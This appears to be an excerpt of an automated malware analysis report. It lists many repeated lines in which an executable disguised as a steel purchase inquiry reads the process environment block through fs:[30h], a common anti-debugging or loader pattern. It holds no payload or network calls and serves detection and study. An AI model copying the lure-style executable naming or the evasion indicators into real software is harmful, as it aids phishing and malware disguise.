Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F205A7 mov eax, dword ptr fs:[00000030h]		0_2_00F205A7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F205A7 mov eax, dword ptr fs:[00000030h]		0_2_00F205A7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F205A7 mov eax, dword ptr fs:[00000030h]		0_2_00F205A7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC45B1 mov eax, dword ptr fs:[00000030h]		0_2_00EC45B1
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC45B1 mov eax, dword ptr fs:[00000030h]		0_2_00EC45B1
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED4588 mov eax, dword ptr fs:[00000030h]		0_2_00ED4588
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA2582 mov eax, dword ptr fs:[00000030h]		0_2_00EA2582
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA2582 mov ecx, dword ptr fs:[00000030h]		0_2_00EA2582
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDE59C mov eax, dword ptr fs:[00000030h]		0_2_00EDE59C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED656A mov eax, dword ptr fs:[00000030h]		0_2_00ED656A
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED656A mov eax, dword ptr fs:[00000030h]		0_2_00ED656A
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED656A mov eax, dword ptr fs:[00000030h]		0_2_00ED656A
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA8550 mov eax, dword ptr fs:[00000030h]		0_2_00EA8550
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA8550 mov eax, dword ptr fs:[00000030h]		0_2_00EA8550
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE53E mov eax, dword ptr fs:[00000030h]		0_2_00ECE53E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE53E mov eax, dword ptr fs:[00000030h]		0_2_00ECE53E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE53E mov eax, dword ptr fs:[00000030h]		0_2_00ECE53E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE53E mov eax, dword ptr fs:[00000030h]		0_2_00ECE53E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE53E mov eax, dword ptr fs:[00000030h]		0_2_00ECE53E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0535 mov eax, dword ptr fs:[00000030h]		0_2_00EB0535
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0535 mov eax, dword ptr fs:[00000030h]		0_2_00EB0535
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0535 mov eax, dword ptr fs:[00000030h]		0_2_00EB0535
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0535 mov eax, dword ptr fs:[00000030h]		0_2_00EB0535
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0535 mov eax, dword ptr fs:[00000030h]		0_2_00EB0535
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0535 mov eax, dword ptr fs:[00000030h]		0_2_00EB0535
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F36500 mov eax, dword ptr fs:[00000030h]		0_2_00F36500
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]		0_2_00F74500
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]		0_2_00F74500
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]		0_2_00F74500
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]		0_2_00F74500
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]		0_2_00F74500
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]		0_2_00F74500
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F74500 mov eax, dword ptr fs:[00000030h]		0_2_00F74500
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1E6F2 mov eax, dword ptr fs:[00000030h]		0_2_00F1E6F2
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1E6F2 mov eax, dword ptr fs:[00000030h]		0_2_00F1E6F2
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1E6F2 mov eax, dword ptr fs:[00000030h]		0_2_00F1E6F2
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1E6F2 mov eax, dword ptr fs:[00000030h]		0_2_00F1E6F2
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F206F1 mov eax, dword ptr fs:[00000030h]		0_2_00F206F1
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F206F1 mov eax, dword ptr fs:[00000030h]		0_2_00F206F1
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDA6C7 mov ebx, dword ptr fs:[00000030h]		0_2_00EDA6C7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDA6C7 mov eax, dword ptr fs:[00000030h]		0_2_00EDA6C7
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDC6A6 mov eax, dword ptr fs:[00000030h]		0_2_00EDC6A6
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED66B0 mov eax, dword ptr fs:[00000030h]		0_2_00ED66B0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA4690 mov eax, dword ptr fs:[00000030h]		0_2_00EA4690
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA4690 mov eax, dword ptr fs:[00000030h]		0_2_00EA4690
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDA660 mov eax, dword ptr fs:[00000030h]		0_2_00EDA660
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDA660 mov eax, dword ptr fs:[00000030h]		0_2_00EDA660
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6866E mov eax, dword ptr fs:[00000030h]		0_2_00F6866E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6866E mov eax, dword ptr fs:[00000030h]		0_2_00F6866E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED2674 mov eax, dword ptr fs:[00000030h]		0_2_00ED2674
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBC640 mov eax, dword ptr fs:[00000030h]		0_2_00EBC640
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA262C mov eax, dword ptr fs:[00000030h]		0_2_00EA262C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBE627 mov eax, dword ptr fs:[00000030h]		0_2_00EBE627
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED6620 mov eax, dword ptr fs:[00000030h]		0_2_00ED6620
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED8620 mov eax, dword ptr fs:[00000030h]		0_2_00ED8620
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]		0_2_00EB260B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]		0_2_00EB260B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]		0_2_00EB260B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]		0_2_00EB260B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]		0_2_00EB260B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]		0_2_00EB260B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB260B mov eax, dword ptr fs:[00000030h]		0_2_00EB260B
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2619 mov eax, dword ptr fs:[00000030h]		0_2_00EE2619
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1E609 mov eax, dword ptr fs:[00000030h]		0_2_00F1E609
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC27ED mov eax, dword ptr fs:[00000030h]		0_2_00EC27ED
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC27ED mov eax, dword ptr fs:[00000030h]		0_2_00EC27ED
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC27ED mov eax, dword ptr fs:[00000030h]		0_2_00EC27ED
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA47FB mov eax, dword ptr fs:[00000030h]		0_2_00EA47FB
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA47FB mov eax, dword ptr fs:[00000030h]		0_2_00EA47FB
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2E7E1 mov eax, dword ptr fs:[00000030h]		0_2_00F2E7E1
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAC7C0 mov eax, dword ptr fs:[00000030h]		0_2_00EAC7C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F207C3 mov eax, dword ptr fs:[00000030h]		0_2_00F207C3
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA07AF mov eax, dword ptr fs:[00000030h]		0_2_00EA07AF
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F547A0 mov eax, dword ptr fs:[00000030h]		0_2_00F547A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4678E mov eax, dword ptr fs:[00000030h]		0_2_00F4678E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA8770 mov eax, dword ptr fs:[00000030h]		0_2_00EA8770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]		0_2_00EB0770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]		0_2_00EB0770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]		0_2_00EB0770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]		0_2_00EB0770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]		0_2_00EB0770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]		0_2_00EB0770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]		0_2_00EB0770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]		0_2_00EB0770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]		0_2_00EB0770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]		0_2_00EB0770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]		0_2_00EB0770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB0770 mov eax, dword ptr fs:[00000030h]		0_2_00EB0770
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED674D mov esi, dword ptr fs:[00000030h]		0_2_00ED674D
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED674D mov eax, dword ptr fs:[00000030h]		0_2_00ED674D
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED674D mov eax, dword ptr fs:[00000030h]		0_2_00ED674D
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F24755 mov eax, dword ptr fs:[00000030h]		0_2_00F24755
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2E75D mov eax, dword ptr fs:[00000030h]		0_2_00F2E75D
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA0750 mov eax, dword ptr fs:[00000030h]		0_2_00EA0750
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2750 mov eax, dword ptr fs:[00000030h]		0_2_00EE2750
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE2750 mov eax, dword ptr fs:[00000030h]		0_2_00EE2750
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1C730 mov eax, dword ptr fs:[00000030h]		0_2_00F1C730
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDC720 mov eax, dword ptr fs:[00000030h]		0_2_00EDC720
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDC720 mov eax, dword ptr fs:[00000030h]		0_2_00EDC720
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED273C mov eax, dword ptr fs:[00000030h]		0_2_00ED273C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED273C mov ecx, dword ptr fs:[00000030h]		0_2_00ED273C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED273C mov eax, dword ptr fs:[00000030h]		0_2_00ED273C
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDC700 mov eax, dword ptr fs:[00000030h]		0_2_00EDC700
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA0710 mov eax, dword ptr fs:[00000030h]		0_2_00EA0710
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED0710 mov eax, dword ptr fs:[00000030h]		0_2_00ED0710
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6A8E4 mov eax, dword ptr fs:[00000030h]		0_2_00F6A8E4
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDC8F9 mov eax, dword ptr fs:[00000030h]		0_2_00EDC8F9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDC8F9 mov eax, dword ptr fs:[00000030h]		0_2_00EDC8F9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECE8C0 mov eax, dword ptr fs:[00000030h]		0_2_00ECE8C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F708C0 mov eax, dword ptr fs:[00000030h]		0_2_00F708C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA0887 mov eax, dword ptr fs:[00000030h]		0_2_00EA0887
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2C89D mov eax, dword ptr fs:[00000030h]		0_2_00F2C89D
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2E872 mov eax, dword ptr fs:[00000030h]		0_2_00F2E872
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2E872 mov eax, dword ptr fs:[00000030h]		0_2_00F2E872
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F36870 mov eax, dword ptr fs:[00000030h]		0_2_00F36870
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F36870 mov eax, dword ptr fs:[00000030h]		0_2_00F36870
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB2840 mov ecx, dword ptr fs:[00000030h]		0_2_00EB2840
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA4859 mov eax, dword ptr fs:[00000030h]		0_2_00EA4859
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA4859 mov eax, dword ptr fs:[00000030h]		0_2_00EA4859
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED0854 mov eax, dword ptr fs:[00000030h]		0_2_00ED0854
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4483A mov eax, dword ptr fs:[00000030h]		0_2_00F4483A
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4483A mov eax, dword ptr fs:[00000030h]		0_2_00F4483A
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC2835 mov eax, dword ptr fs:[00000030h]		0_2_00EC2835
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC2835 mov eax, dword ptr fs:[00000030h]		0_2_00EC2835
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC2835 mov eax, dword ptr fs:[00000030h]		0_2_00EC2835
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC2835 mov ecx, dword ptr fs:[00000030h]		0_2_00EC2835
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC2835 mov eax, dword ptr fs:[00000030h]		0_2_00EC2835
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EC2835 mov eax, dword ptr fs:[00000030h]		0_2_00EC2835
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EDA830 mov eax, dword ptr fs:[00000030h]		0_2_00EDA830
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2C810 mov eax, dword ptr fs:[00000030h]		0_2_00F2C810
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2E9E0 mov eax, dword ptr fs:[00000030h]		0_2_00F2E9E0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED29F9 mov eax, dword ptr fs:[00000030h]		0_2_00ED29F9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED29F9 mov eax, dword ptr fs:[00000030h]		0_2_00ED29F9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F6A9D3 mov eax, dword ptr fs:[00000030h]		0_2_00F6A9D3
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F369C0 mov eax, dword ptr fs:[00000030h]		0_2_00F369C0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAA9D0 mov eax, dword ptr fs:[00000030h]		0_2_00EAA9D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAA9D0 mov eax, dword ptr fs:[00000030h]		0_2_00EAA9D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAA9D0 mov eax, dword ptr fs:[00000030h]		0_2_00EAA9D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAA9D0 mov eax, dword ptr fs:[00000030h]		0_2_00EAA9D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAA9D0 mov eax, dword ptr fs:[00000030h]		0_2_00EAA9D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EAA9D0 mov eax, dword ptr fs:[00000030h]		0_2_00EAA9D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED49D0 mov eax, dword ptr fs:[00000030h]		0_2_00ED49D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F289B3 mov esi, dword ptr fs:[00000030h]		0_2_00F289B3
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F289B3 mov eax, dword ptr fs:[00000030h]		0_2_00F289B3
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F289B3 mov eax, dword ptr fs:[00000030h]		0_2_00F289B3
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA09AD mov eax, dword ptr fs:[00000030h]		0_2_00EA09AD
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA09AD mov eax, dword ptr fs:[00000030h]		0_2_00EA09AD
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB29A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB29A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB29A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB29A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB29A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB29A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB29A0
